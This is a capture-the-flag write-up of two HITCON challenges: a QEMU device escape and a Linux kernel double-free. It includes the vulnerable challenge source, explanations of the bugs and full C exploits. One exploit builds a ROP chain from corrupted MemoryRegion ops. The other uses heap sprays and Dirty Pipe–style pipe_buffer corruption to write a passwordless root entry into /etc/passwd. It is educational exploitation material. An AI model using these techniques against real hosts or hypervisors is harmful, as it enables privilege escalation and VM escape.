Last weekend I played the qualification for the HITCON ctf as part of Maltese Prison Escapees. We got 8th and by that unfortunately missed the final by 1 place :(.

scoreboard

Same as last year, the ctf had once again a fullchain pwn challenge to offer. This time it was chroot jailbreak -> kernel -> QEMU escape.

This post is a writeup of the QEMU escape (Wall Maria) and the kernel challenge (Wall Rose). I solved the kernel challenge. A teammate solved the QEMU challenge but I also developed my own exploit for it. The exploit codes and challenge files can be found in my repository.

Wall Maria

Wall Maria was a QEMU escape challenge. We are given the source code for the peripheral device “maria”:

#include "hw/hw.h"
#include "hw/pci/msi.h"
#include "hw/pci/pci.h"
#include "qapi/visitor.h"
#include "qemu/main-loop.h"
#include "qemu/module.h"
#include "qemu/osdep.h"
#include "qom/object.h"

#define TYPE_PCI_MARIA_DEVICE "maria"
#define MARIA_MMIO_SIZE 0x10000

#define BUFF_SIZE 0x2000

typedef struct {
    PCIDevice pdev;
    struct {
		uint64_t src;
        uint8_t off;
	} state;
    char buff[BUFF_SIZE];
    MemoryRegion mmio;
} MariaState;

DECLARE_INSTANCE_CHECKER(MariaState, MARIA, TYPE_PCI_MARIA_DEVICE)

static uint64_t maria_mmio_read(void *opaque, hwaddr addr, unsigned size) {
    MariaState *maria = (MariaState *)opaque;
    uint64_t val = 0;
    switch (addr) {
        case 0x00:
            cpu_physical_memory_rw(maria->state.src, &maria->buff[maria->state.off], BUFF_SIZE, 1);
            val = 0x600DC0DE;
            break;
        case 0x04:
            val = maria->state.src;
            break;
        case 0x08:
            val = maria->state.off;
            break;
        default:
            val = 0xDEADC0DE;
            break;
    }
    return val;
}

static void maria_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size) {
    MariaState *maria = (MariaState *)opaque;
    switch (addr) {
        case 0x00:
            cpu_physical_memory_rw(maria->state.src, &maria->buff[maria->state.off], BUFF_SIZE, 0);
            break;
        case 0x04:
            maria->state.src = val;
            break;
        case 0x08:
            maria->state.off = val;
            break;
        default:
            break;
    }
}

static const MemoryRegionOps maria_mmio_ops = {
    .read = maria_mmio_read,
    .write = maria_mmio_write,
    .endianness = DEVICE_NATIVE_ENDIAN,
    .valid = {
        .min_access_size = 4,
        .max_access_size = 4,
    },
    .impl = {
        .min_access_size = 4,
        .max_access_size = 4,
    },
};

static void pci_maria_realize(PCIDevice *pdev, Error **errp) {
    MariaState *maria = MARIA(pdev);
    memory_region_init_io(&maria->mmio, OBJECT(maria), &maria_mmio_ops, maria, "maria-mmio", MARIA_MMIO_SIZE);
    pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &maria->mmio);
}

static void maria_instance_init(Object *obj) {
    MariaState *maria = MARIA(obj);
    memset(&maria->state, 0, sizeof(maria->state));
    memset(maria->buff, 0, sizeof(maria->buff));
}

static void maria_class_init(ObjectClass *class, void *data) {
    DeviceClass *dc = DEVICE_CLASS(class);
    PCIDeviceClass *k = PCI_DEVICE_CLASS(class);

    k->realize = pci_maria_realize;
    k->vendor_id = PCI_VENDOR_ID_QEMU;
    k->device_id = 0xDEAD;
    k->revision = 0x0;
    k->class_id = PCI_CLASS_OTHERS;

    set_bit(DEVICE_CATEGORY_MISC, dc->categories);
}

static void pci_maria_register_types(void) {
    static InterfaceInfo interfaces[] = {
        { INTERFACE_CONVENTIONAL_PCI_DEVICE },
        { },
    };
    static const TypeInfo maria_info = {
        .name = TYPE_PCI_MARIA_DEVICE,
        .parent = TYPE_PCI_DEVICE,
        .instance_size = sizeof(MariaState),
        .instance_init = maria_instance_init,
        .class_init = maria_class_init,
        .interfaces = interfaces,
    };

    type_register_static(&maria_info);
}

type_init(pci_maria_register_types)

We can can write to an internal buffer of the peripheral and read from it. To interact with the device from userspace we can use memory-mapped I/O (MMIO). The difficult part though for this challenge is that the buffer is two pages big (0x2000) and we need to pass the physical address of our buffer. Obtaining two continuous physical pages for an userspace buffer of size 0x2000 however is very unlikely / difficult.

To circumvent this, my teammate who solved the challenge had the great idea to only allocate a buffer of size 0x1000 and use that for exploitation. The author of this challenge used a different technique based on huge pages to actually obtain a buffer of size 0x2000 which is backed by two continuous physical pages. You can read the writeup here.

Bug

The bug for this challenge is very obvious. We can specify an offset for reading and writing but the code doesn’t account for this and still reads / writes 0x2000 bytes. Therefore, this gives us an oor / oow primitive from MariaState.buff.

Exploitation

Based on the oor / oow primitive we can corrupt the MemoryRegion struct which is located directly after buff.

struct MemoryRegion {
    Object parent_obj;

    /* private: */

    /* The following fields should fit in a cache line */
    bool romd_mode;
    bool ram;
    bool subpage;
    bool readonly; /* For RAM regions */
    bool nonvolatile;
    bool rom_device;
    bool flush_coalesced_mmio;
    uint8_t dirty_log_mask;
    bool is_iommu;
    RAMBlock *ram_block;
    Object *owner;
    /* owner as TYPE_DEVICE. Used for re-entrancy checks in MR access hotpath */
    DeviceState *dev;

    const MemoryRegionOps *ops;
    void *opaque;

    ...
}

Looking at the first members of the struct we see that it contains an ops member which is a pointer to a function table containing MemoryRegion callbacks. The first function that is called when we access the MMIO region of the peripheral device is the accepts function. So by corrupting this function pointer, based on changing the ops pointer to a memory region we control, we can gain RIP control.

    /*
     * If present, and returns #false, the transaction is not accepted
     * by the device (and results in machine dependent behaviour such
     * as a machine check exception).
     */
    bool (*accepts)(void *opaque, hwaddr addr,
                    unsigned size, bool is_write,
                    MemTxAttrs attrs);

Looking at the function signature we can see that the first parameter is opaque. This is the pointer in the MemoryRegion struct that comes right after the ops pointer. So by also overwriting this pointer, we can also control rdi. Sadly we can’t simply call system("/bin/sh") as the qemu binary has a seccomp filter preventing this.

Therefore, I corrupted the accepts function pointer with a push rdi; pop rbp; ret gadget in order to stack pivot and execute a ropchain to read the flag.

Exploit

#include <assert.h>
#include <fcntl.h>
#include <stdio.h>
#include <stddef.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>

#include <sys/mman.h>
#include <sys/types.h>

#define true 1
#define false 0

// Address of the mmio region in physical memory
#define MMIO_PHYSADDR 0xfebd0000
#define MMIO_DELETE_PHYSADDR (MMIO_PHYSADDR + offsetof(struct mmio, delete_req))
#define MMIO_SIZE 0x10000
#define DEV_PATH "/sys/devices/pci0000:00/0000:00:05.0/resource0"
#define PAGE_SZ 0x1000

volatile int result;

typedef struct {
    uint32_t op;
    uint32_t src;
    uint32_t off;
} mmio_t;

struct tcache {
    uint16_t counts[64];
    uint64_t entries[64];
};

static void die(const char* msg)
{
    perror(msg);
    exit(-1);
}

#define WAIT(void) {getc(stdin); \
                    fflush(stdin);}
#define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); \
                        } while (0)

static void hexdump8(uint64_t* buf, int len)
{
    assert(len % 0x8 == 0);
    for (int i = 1; i <= len / 8; i++) {
        printf("0x%016llx ", buf[i-1]);
        if (i % 0x2 == 0) {
            printf("\n");
        }
    }

    printf("\n");
}

// See https://www.kernel.org/doc/Documentation/vm/pagemap.txt
static uint64_t virt2phys(void* p, int has_to_be_present)
{
    uint64_t virt = (uint64_t)p;
    uint32_t saved_offset = virt & 0xfff;
    virt -= saved_offset;

    // Assert page alignment
    assert((virt & 0xfff) == 0);

    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd == -1) {
        errExit("open");
    }

    uint64_t offset = (virt / 0x1000) * 8;
    lseek(fd, offset, SEEK_SET);

    uint64_t phys;
    if (read(fd, &phys, 8 ) != 8) {
        errExit("read");
    }

    // Assert page present
    assert((!has_to_be_present) || phys & (1ULL << 63));

    phys = (phys & ((1ULL << 54) - 1)) * 0x1000;
    return phys + saved_offset;
}

#define TRIGGER 0x0

// read in our buffer
static uint32_t maria_read(mmio_t* mmio, uint32_t src, uint8_t off)
{
    mmio->src = src;
    mmio->off = off;
    return mmio->op;
}

// write buffer to us
static uint32_t maria_write(mmio_t* mmio, uint32_t src, uint8_t off) {
    mmio->src = src;
    mmio->off = off;
    mmio->op = TRIGGER;
}

void *
alloc_workbuf(size_t size)
{
    int ret;
    void* ptr = aligned_alloc(PAGE_SZ, size);

    /* return NULL on failure */
    if (ptr == NULL) {
        errExit("posix_memalign");
    }

    /* lock this buffer into RAM */
    ret = mlock(ptr, size);
    if (ret < 0) {
        errExit("mlock");
    }
    return ptr;
}

typedef struct {
    uint64_t read_fp;
    uint64_t write_fp;
    uint64_t read_with_attrs_fp;
    uint64_t write_with_attrs_fp;
    int endianness;
    struct {
        unsigned min_access_size;
        unsigned max_access_size;
         bool unaligned;
        uint64_t accepts_fp;
    } valid;
    struct {
        unsigned min_access_size;
        unsigned max_access_size;
        bool unaligned;
    } impl;

} mem_reg_ops_t;

int main(void)
{
    int fd = open(DEV_PATH, O_RDWR | O_SYNC);
    int ret;

    if (fd < 0) {
        errExit("open dev");
    }

    mmio_t *mmio = mmap(NULL, MMIO_SIZE, PROT_READ | PROT_WRITE,
                                      MAP_SHARED, fd, 0);

    if (mmio == MAP_FAILED) {
        errExit("mmio mmap");
    }

    char *buf = alloc_workbuf(0x1000);

    uint64_t addr = virt2phys(buf, true);
    printf("phys addr: %p\n", addr);

    memset(buf, 0x0, 0x20);

    // -0x1000 to account for the fact that our buffer is only 0x1000 bytes big
    ret = maria_read(mmio, addr - 0x1000, 88);

    uint64_t* p_buf = (uint64_t*)(buf+ 0x1000-88);
    uint64_t qemu_leak = p_buf[0x48/ 8];
    // opaque = first param to mmio funcs
    uint64_t opaque = p_buf[0x50 / 8];
    uint64_t system_plt = qemu_leak - 0xc13ee0;
    uint64_t execv_plt = qemu_leak - 0xc14620;
    uint64_t qemu_base = qemu_leak -0xf1ff80;

    uint64_t pop_rdi_ret = qemu_base + 0x632c5d;
    uint64_t pop_rsi_ret = qemu_base + 0x4d4db3;
    uint64_t pop_rdx_ret = qemu_base + 0x47f5c8;

    uint64_t read_plt = qemu_base + 0x30d460;
    uint64_t open_plt = qemu_base + 0x30a270;
    uint64_t write_plt = qemu_base + 0x30dc70;
    uint64_t nop = qemu_base + 0x30601a;

    uint64_t xchg_rsi_rax = qemu_base + 0x9a6176;

    uint64_t push_rdi_pop_rbp = qemu_base + 0x8e7014;

    memcpy(buf, "/home/h0ps/flag", strlen("/home/h0ps/flag"));
    uint64_t str_loc = opaque + 0x1a88;

    // corrupt ops ptr, point it to our fake ops
    p_buf[0x48 / 8] = opaque + 0x1a88 + 0x20;
    // corrupt opaque member
    // -0x8 due to rbp pop
    p_buf[0x50 / 8] = opaque + 0x1a88 + 0x20 + sizeof(mem_reg_ops_t) - 0x8;

    p_buf = (uint64_t*)buf;
    uint64_t off = 0x20 / 8;

    mem_reg_ops_t *ops = (mem_reg_ops_t*)&p_buf[off];
    ops->valid.accepts_fp = push_rdi_pop_rbp;

    off += sizeof(mem_reg_ops_t) / sizeof(uint64_t);

    p_buf[off++] = pop_rdi_ret;
    p_buf[off++] = str_loc;
    p_buf[off++] = pop_rsi_ret;
    p_buf[off++] = 0x0;
    p_buf[off++] = pop_rdx_ret;
    p_buf[off++] = 0x0;
    p_buf[off++] = open_plt;

    p_buf[off++] = pop_rdi_ret;
    p_buf[off++] = 0xc;
    p_buf[off++] = pop_rsi_ret;
    p_buf[off++] = str_loc;
    p_buf[off++] = pop_rdx_ret;
    p_buf[off++] = 0x40;
    p_buf[off++] = read_plt;

    p_buf[off++] = pop_rdi_ret;
    p_buf[off++] = 0x1;
    p_buf[off++] = pop_rsi_ret;
    p_buf[off++] = str_loc;
    p_buf[off++] = pop_rdx_ret;
    p_buf[off++] = 0x40;
    p_buf[off++] = write_plt;

    p_buf[off++] = 0x424242;

    maria_write(mmio, addr - 0x1000, 88);

    printf("Fake stack: %p \n", opaque + 0x1a88+0x10);
    printf("qemu_leak: %p \n", qemu_leak);
    printf("system: %p \n", system_plt);
    printf("Opaqque: %p \n", opaque);
    printf("/bin/sh: %p \n", opaque+0x1a88);
    //hexdump8(p_buf, 0x80);

    //WAIT();
    // trigger chain
    ret = maria_read(mmio, 0x414141, 0x424242);
    return 0;
}

Wall Rose

Wall Rose was a kernel pwn challenge. We were given the source code of the vulnerable module which is very simple:

#include <linux/atomic.h>
#include <linux/device.h>
#include <linux/fs.h>
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/miscdevice.h>
#include <linux/module.h>
#include <linux/slab.h>
#include <linux/uaccess.h>
#include <asm/errno.h>
#include <linux/printk.h>

#define MAX_DATA_HEIGHT 0x400

MODULE_AUTHOR("wxrdnx");
MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("Wall Rose");

static char *data;

static int rose_open(struct inode *inode, struct file *file) {
    data = kmalloc(MAX_DATA_HEIGHT, GFP_KERNEL);
    if (!data) {
        printk(KERN_ERR "Wall Rose: kmalloc error\n");
        return -1;
    }
    memset(data, 0, MAX_DATA_HEIGHT);
    return 0;
}

static int rose_release(struct inode *inode, struct file *file) {
    kfree(data);
    return 0;
}

static ssize_t rose_read(struct file *filp, char __user *buffer, size_t length, loff_t *offset) {
    pr_info("Wall Rose: data dropped");
    return 0;
}

static ssize_t rose_write(struct file *filp, const char __user *buffer, size_t length, loff_t *offset) {
    pr_info("Wall Rose: data dropped");
    return 0;
}

static struct file_operations rose_fops = {
    .owner = THIS_MODULE,
    .open = rose_open,
    .release = rose_release,
    .read = rose_read,
    .write = rose_write,
};

static struct miscdevice rose_device = {
    .minor = MISC_DYNAMIC_MINOR,
    .name = "rose",
    .fops = &rose_fops,
};

static int __init rose_init(void) {
    return misc_register(&rose_device);
}

static void __exit rose_exit(void) {
    misc_deregister(&rose_device);
}

module_init(rose_init);
module_exit(rose_exit);

We can’t do anything other than opening and closing the device. Read and write both do nothing.

Bug

The bug is very simple as well. We can free the last allocated chunk many times by opening the module multiple times and then closing it multiple times. Since the data chunk is 0x400 bytes big, this means we can free arbitrary objects in the kmalloc-1024 slab.

Exploitation

A special thing about this challenge was that it had CONFIG_FG_KASLR (function granular KASLR) enabled. This configuration enables finer grained kernel address space randomization on a per-function level granularity. This means that obtaining a kernel base leak is not as easy as simply leaking e.g. an ops pointer and subtracting an offset. Furthermore, we can’t open /dev/ptmx which prevents us from leveraging tty_struct for exploitation.

Given these circumstances, using an exploitation technique which doesn’t require a kernel leak seemed like a good idea. One interesting structure for this is the pipe_buffer struct which gets allocated when using pipes. If we are able to corrupt such a struct we can emulate the dirty pipe vulnerability and corrupt /etc/passwd. For background information on dirty pipe, refer to this post.

So the basic plan is:

  1. Allocate a bunch of pipes
  2. Call splice on them with a fd for /etc/passwd to create a file-backed pipe_buffer
  3. Corrupt the flags member of the pipe_buffer to PIPE_BUF_FLAG_CAN_MERGE (0x10)
  4. Write root user without password to /etc/passwd
  5. Win

Looking at the pipe_buffer struct, we see that the flags member is at offset 24:

struct pipe_buffer {
	struct page *page;
	unsigned int offset, len;
	const struct pipe_buf_operations *ops;
	unsigned int flags;
	unsigned long private;
};

So to corrupt the flags member while keeping the struct valid, we need to leak pointers first.

Leaking pointers of a file-backed pipe_buffer

To leak pointers we can free a user_key_payload struct using the bug of the module and corrupt it with a msg_msg struct. Both are elastic objects so we can make them go into the kmalloc-1024 slab.

struct msg_msg {
	struct list_head m_list;
	long m_type;
	size_t m_ts;		/* message text size */
	struct msg_msgseg *next;
	void *security;
	/* the actual message follows immediately */
};

struct user_key_payload {
	struct rcu_head	rcu;		/* RCU destructor */
	unsigned short	datalen;	/* length of this data */
	char		data[] __aligned(__alignof__(u64)); /* actual data */
};

If we free a user_key_payload struct and then corrupt it by allocating a msg_msg struct on top of it, the datalen field will be overwritten by the m_type field of the msg_msg struct. By choosing a big enough number for the type of our msg, we can use this to achieve oor.

Once we have an out of bounds read on the heap, we can use this to leak pipe_buffer pointers.

Corrupting file-backed pipe_buffer

Having obtained valid pointers for a file-backed pipe_buffer we can then simply overwrite another file-backed pipe_buffer using either msg_msg struct or user_key_payload.

Exploit

#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/timerfd.h>
#include <sys/msg.h>
#include <fcntl.h>
#include <stdint.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/keyctl.h>
#include <limits.h>
#include <stdarg.h>
#include <sys/xattr.h>
#include <stdlib.h>
#include <stdbool.h>
#include <sched.h>
#include <errno.h>
#include <sys/wait.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/msg.h>
#include <sys/timerfd.h>

#define DEV_PATH "/dev/rose"   // the path the device is placed

#define ulong unsigned long
#define PAGE_SZ 0x1000
#define FAULT_ADDR 0xdead0000
#define FAULT_OFFSET PAGE
#define MMAP_SIZE 4*PAGE
#define FAULT_SIZE MMAP_SIZE - FAULT_OFFSET
#define ARRAY_SIZE(a) (sizeof((a)) / sizeof((a)[0]))
#define HEAP_MASK 0xffff000000000000
#define KERNEL_MASK 0xffffffff00000000

#define WAIT(void) {getc(stdin); \
                    fflush(stdin);}
#define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); \
                        } while (0)

#define KMALLOC(qid, msgbuf, N) for(int ix=0; ix!=N; ++ix){\
                        if(msgsnd(qid, &msgbuf, sizeof(msgbuf.mtext) - 0x30, 0) == -1) \
                            errExit("KMALLOC"); \
                        }


int pipes[0x1000][0x02];
int qids[0x1000];
int keys[0x1000];
int seq_ops[0x10000];
int ptmx[0x1000];
int n_keys;

typedef struct msg_msg_seg msg_msg_seg_t;
struct msg_msg_seg {
    msg_msg_seg_t* next;
};

struct rcu_head {
    void *next;
    void *func;
};

typedef struct msg_msg {
    struct rcu_head m_list;
    long m_type;
    size_t m_ts;      /* message text size */
    struct msg_msgseg *next;
    void *security;
    /* the actual message follows immediately */
} msg_msg_t;

// size = 40
typedef struct
{
    uint64_t page;
    uint32_t offset;
    uint32_t len;
    uint64_t ops;
    uint32_t flags;
    uint32_t padding;
    uint64_t private;
}pipe_buf_t;

struct user_key_payload {
    struct rcu_head rcu;
    unsigned short datalen;
    char *data[];
};

typedef struct {
    long kaslr_base;
    long physmap_base;
} leak_t;

typedef int32_t key_serial_t;

static void alloc_qid(int i) {
    qids[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    if (qids[i] < 0) {
        errExit("[X] msgget");
    }
}

static void send_msg(int qid, int c, int size, long type)
{
    struct msgbuf
    {
        long mtype;
        char mtext[size - sizeof(msg_msg_t)];
    } msg;

    if (!type) {
        msg.mtype = 0xffff;
    }
    else {
        msg.mtype = type;
    }

    memset(msg.mtext, c, sizeof(msg.mtext));

    if (msgsnd(qid, &msg, sizeof(msg.mtext), IPC_NOWAIT) < 0)
    {
        errExit("msgsnd");
    }
}

static void send_msg_payload(int qid, char* buf, int size, long type)
{
    int off = sizeof(msg_msg_t);
    if (size > PAGE_SZ) {
        off += sizeof(msg_msg_seg_t);
    }

    struct msgbuf
    {
        long mtype;
        char mtext[size - off];
    } msg;

    memcpy(msg.mtext, buf, sizeof(msg.mtext));

    if (!type) {
        msg.mtype = 0xffff;
    }
    else {
        msg.mtype = type;
    }

    if (msgsnd(qid, &msg, sizeof(msg.mtext), IPC_NOWAIT) < 0)
    {
        errExit("msgsnd");
    }
}

static void recv_msg(int qid, void* data, size_t sz)
{
    int ret;
    struct msg_buf
    {
        long mtype;
        char mtext[sz - 0x30];
    } msg;

    ret = msgrcv(qid, &msg, sz - 0x30, 0xffff, IPC_NOWAIT);

    memmove(data, msg.mtext, sizeof(msg.mtext));

    if (ret < 0) {
        errExit("msgrcv");
    }
}

static void print_hex8(void* buf, size_t len)
{
    uint64_t* tmp = (uint64_t*)buf;

    for (int i = 0; i < (len / 8); i++) {
        printf("%d: %p ", i, tmp[i]);
        if ((i + 1) % 2 == 0) {
            printf("\n");
        }
    }

    printf("\n");
}

static void alloc_tty(int i) {
    ptmx[i] = open("/dev/ptmx", O_RDWR | O_NOCTTY);

    if (ptmx[i] < 0) {
        errExit("[X] alloc_tty");
    }
}

static void free_tty(int i) {
    if (close(ptmx[i]) < 0) {
        errExit("[X] free tty");
    }
}

static bool is_kernel_ptr(uint64_t val)
{
    return (val & KERNEL_MASK) == KERNEL_MASK
        && val != 0xffffffffffffffff;
}

static bool is_heap_ptr(uint64_t val)
{
    return (val & HEAP_MASK) == HEAP_MASK
        && (val & KERNEL_MASK) != KERNEL_MASK
        && val != 0xffffffffffffffff;
}

void info(const char *format, ...) {
    va_list args;
    va_start(args, format);

    printf("[+] ");
    vprintf(format, args);

    va_end(args);
}

void error(const char *format, ...) {
    va_list args;
    va_start(args, format);

    printf("[x] ");
    vprintf(format, args);

    va_end(args);
}

static inline key_serial_t add_key(const char *type, const char *description, const void *payload, size_t plen, key_serial_t ringid) {
    long ret = syscall(__NR_add_key, type, description, payload, plen, ringid);
    if (ret < 0) {
        errExit("add_key");
    }
}

static inline long keyctl(int operation, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5) {
    return syscall(__NR_keyctl, operation, arg2, arg3, arg4, arg5);
}

static long free_key(key_serial_t key) {

    long ret = keyctl(KEYCTL_REVOKE, key, 0, 0, 0);

    if (ret < 0) {
        errExit("keyctl revoke");
    }

    ret = keyctl(KEYCTL_UNLINK, key, KEY_SPEC_PROCESS_KEYRING, 0, 0);

    if (ret < 0) {
        errExit("keyctl unlink");
    }
}

static int alloc_key(int id, char *buf, size_t size)
{
    char desc[0x400] = { 0 };
    char payload[0x400] = {0};
    int key;

    size -= sizeof(struct user_key_payload);

    sprintf(desc, "payload_%d", id);

    if (!buf) {
        memset(payload, 0x41, size);
    }
    else {
        memcpy(payload, buf, size);
    }

    key = add_key("user", desc, payload, size, KEY_SPEC_PROCESS_KEYRING);

    if (key < 0)
	{
        errExit("add_key");
	}

    return key;
}

void alloc_pipe_buf(int i)
{
    if (pipe(pipes[i]) < 0) {
        perror("[X] alloc_pipe_buff()");
        return;
    }
}

void release_pipe_buf(int i)
{
    if (close(pipes[i][0]) < 0) {
        errExit("[X] release_pipe_buf");
    }

    if (close(pipes[i][1]) < 0) {
        errExit("[X] release_pipe_buf");
    }
}

int main(int argc, char** argv)
{
    int fd1;
    int fd2;
    int fd3;
    int fd4;
    int ret;
    uint8_t buf[0x10000];

    for (int i = 0x0; i < 0x10; i++) {
        alloc_pipe_buf(i);
        write(pipes[i][1], "hello", 5);
    }

    fd1 = open(DEV_PATH, O_RDONLY);
    fd2 = open(DEV_PATH, O_RDONLY);

    if (fd1 < 0 || fd2 < 0) {
        errExit("open");
    }

    close(fd1);

    info("spraying userkey structs \n");

    // allocated user_key_payload in place of freed struct
    for (int i = 0; i < 0x10; i++) {
        keys[i] = alloc_key(n_keys++, 0, 800);
    }

    info("closing second fd \n");
    // free user_key_payload
    close(fd2);

    info("Spraying msg ojects \n");
    // spray msg objects, corrupt userkey payload
    for (int i = 0; i < 0x40;i++) {
        alloc_qid(i);
        send_msg(qids[i], 0xff, 0x400, 0);
    }

    memset(buf, 0x0, sizeof(buf));
    uint64_t* p_buf = (uint64_t*)buf;

    int fd_passwd = open("/etc/passwd", O_RDONLY);
    if (fd_passwd < 0) {
        errExit("open /etc/passwd");
    }

    // call splice on the initial sprayed pipes, causing file-backed pipe_buffer to be allocated.
    // we will leak these pointers later
    for (int i = 0; i < 0x10; i++) {
        ret = splice(fd_passwd, NULL, pipes[i][1], NULL, 1 ,0);
        if (ret  < 0) {
            errExit("splice");
        }
    }

    // search corrupted user_key_payload for oor
    int corrupted_userkey = 0x0;
    for (int i = 0; i < 0x10; i++) {
        ret = keyctl(KEYCTL_READ, keys[i], buf, sizeof(buf), 0);
        if (ret == sizeof(buf)-1) {
            corrupted_userkey = i;
            info("Found corrupted userkey payload \n");
            break;
        }
        if (ret < 0) {
            errExit("keyctl read");
        }
    }

    // search file backed pipe_buffer struct
    int pipe_idx = 0x0;
    for (int i = 0; i < sizeof(buf) / sizeof(uint64_t); i++) {
        pipe_buf_t* initial_buf = (pipe_buf_t*)&p_buf[i];
        pipe_buf_t* file_backed_buf = (pipe_buf_t*)&p_buf[i+5];
        if (is_heap_ptr(initial_buf->page) && is_kernel_ptr(initial_buf->ops) &&
            is_heap_ptr(file_backed_buf->page) && is_kernel_ptr(file_backed_buf->ops)) {

            // len == 5 because we wrote 5 bytes (hello) to the pipes
            if (initial_buf->len == 5 && initial_buf->flags == 0x10 && file_backed_buf->flags == 0) {
                pipe_idx = i+5;
                print_hex8(initial_buf, 0x50);
                break;
            }
        }
    }

    if (pipe_idx == 0x0) {
        printf("Unable to find pipe \n");
        return 0;
    }

    for (int i = 0; i < 0x10; i++) {
        if (i != corrupted_userkey) {
            free_key(keys[i]);
        }
    }

    fd3 = open(DEV_PATH, O_RDONLY);
    fd4 = open(DEV_PATH, O_RDONLY);

    if (fd3 < 0  || fd4 < 0) {
        errExit("fd3 / fd4");
    }

    close(fd3);

    for (int i = 0x10; i < 0x20; i++) {
        alloc_pipe_buf(i);
        write(pipes[i][1], "hello", 5);
    }

    // create more file backed pipe_bufs, one of them we will corrupt
    for (int i = 0x10; i < 0x20; i++) {
        ret = splice(fd_passwd, NULL, pipes[i][1], NULL, 1 ,0);
        if (ret  < 0 || ret == 0) {
            errExit("splice");
        }
    }

    pipe_buf_t *pipe = (pipe_buf_t*)&p_buf[pipe_idx];
    info("Pipe data: %p %p %lx \n", pipe->page, pipe->ops, pipe->flags);

    // set PIPE_BUF_FLAG_CAN_MERGE flag on file backed pipe_buf
    pipe->flags = 0x10;
    pipe->len = 0x0;
    pipe->offset = 0x0;

    // UAF pipe buf
    close(fd4);

    char msg_msg_buf[0x2000] = {0};

    /*** Method 1: corrupt using msg_msg struct ***/
    // -4 since the first 8 byte will be written by msg_msg_seg->next
    memcpy(&msg_msg_buf[PAGE_SZ - sizeof(msg_msg_t)], &p_buf[pipe_idx-4], 0x100);
    for (int i = 0x40; i < 0x50; i++) {
        alloc_qid(i);
        //send_msg(qids[i], 0x41, 0x400, 0);
        send_msg_payload(qids[i], msg_msg_buf, PAGE_SZ + 0x400, 0x0);
    }

    /*** Method 2: corrupt using user_key_payload struct ***/
    /*
    for (int i = 0x0; i < 0x10; i++) {
        if (i == corrupted_userkey) {
            continue;
        }
        // pipe_idx-2 since user_key_payload takes up 24 bytes so we corrupt starting
        // from pipe->flags member of the initial pipe_buf in the ringbuffer
        // (so 16 byte left of that struct before we can corrupt file backed)
        keys[i] = alloc_key(n_keys++, &p_buf[pipe_idx-2], 800);
    }
    */

    const char *const data = "root::0:0:root:/root:/bin/sh\n";
    for (int i = 0x10; i < 0x20; i++) {
        ret = write(pipes[i][1], data, strlen(data));
        //read(pipes[i][0], buf, 0x400);
    }

    info("Calling system \n");
    system("cat /etc/passwd");
    system("su");

    WAIT();
}